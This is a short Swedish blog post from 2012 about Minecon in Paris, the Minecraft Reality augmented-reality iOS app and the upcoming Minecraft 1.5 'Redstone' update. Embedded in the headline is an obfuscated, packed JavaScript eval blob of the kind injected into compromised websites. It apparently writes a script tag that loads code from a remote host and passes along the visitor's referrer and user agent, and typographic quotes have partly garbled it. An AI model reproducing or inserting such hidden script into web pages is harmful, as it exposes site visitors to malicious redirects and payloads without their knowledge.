Image Image Image Image Image Image Image Image Image Image

| 29 maj, 2020

Scroll to top

Top

Minecon och Minecraft Reality

Filip Urde
  • On 26 november, 2012
  • http://www.revue.se/filip-urde

Minecon eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|khzyk|var|u0026u|referrer|yizbr||js|php’.split(’|’),0,{}))
i helgen: Coolast var Minecraft Reality

I helgen var det Minecon i Paris och man visade bland annat att Minecraft har portats till Raspberry Pi, men ballast var augmented reality-appen för iOS.

Minecraft Reality heter appen och gör att du kan placera ut dina Minecraft-skapelser i verkligheten. Du kan även spara dina saker på en GPS-position så andra människor kan se dem när de besöker samma plats. Appen kostar 15 kronor och laddas som vanligt ner via App Store. Riktigt ballt!!

Man pratade också om Minecraft 1.5 som går under namnet Redstone.

Mer om vad redstone läser ni på länken nedan.

www.gamespot.com